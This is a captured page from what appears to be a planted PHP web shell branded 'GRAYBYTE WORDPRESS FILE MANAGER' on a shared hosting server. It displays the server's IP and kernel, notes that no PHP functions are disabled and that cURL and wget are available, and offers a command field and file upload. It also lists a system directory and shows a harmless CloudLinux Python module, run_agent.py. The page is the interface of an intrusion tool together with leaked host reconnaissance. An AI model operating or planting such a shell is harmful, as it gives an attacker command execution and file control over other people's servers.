GRAYBYTE WORDPRESS FILE MANAGER3483

Server IP : 198.54.121.189 / Your IP : 216.73.216.112
System : Linux premium69.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
PHP Version : 7.4.33
Disable Function : NONE
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /opt/cloudlinux/venv/lib/python3.11/site-packages/ssa/ssa_utils/
Upload Files :
Current_dir [ Not Writeable ] Document_root [ Writeable ]

Command :


Current File : /opt/cloudlinux/venv/lib/python3.11/site-packages/ssa/ssa_utils//run_agent.py
# -*- coding: utf-8 -*-

# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2021 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT

"""
This module contains SSA Agent main run function
"""
import sys

from ssa.agent import SimpleAgent as Agent
from ssa.internal.constants import agent_log
from ssa.internal.exceptions import SSAError
from ssa.internal.tools import register_sigterm
from ssa.internal.utils import configure_logging


def run() -> None:
    """
    Main run function
    """
    configure_logging(agent_log)
    register_sigterm()

    try:
        agent = Agent()
        agent()
    except SSAError as e:
        print(e)
        sys.exit(1)

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
May 01 2025 08:30:33
root / root
0755
__pycache__
--
May 01 2025 08:36:52
root / root
0755
__init__.py
0 KB
April 10 2025 08:42:28
root / root
0644
cmdline_parser.py
5.285 KB
April 10 2025 08:42:28
root / root
0644
run_agent.py
0.716 KB
April 10 2025 08:42:28
root / root
0644
run_autotracing.py
2.868 KB
April 10 2025 08:42:28
root / root
0644
run_manager.py
1.771 KB
April 10 2025 08:42:28
root / root
0644
validations.py
3.51 KB
April 10 2025 08:42:28
root / root
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF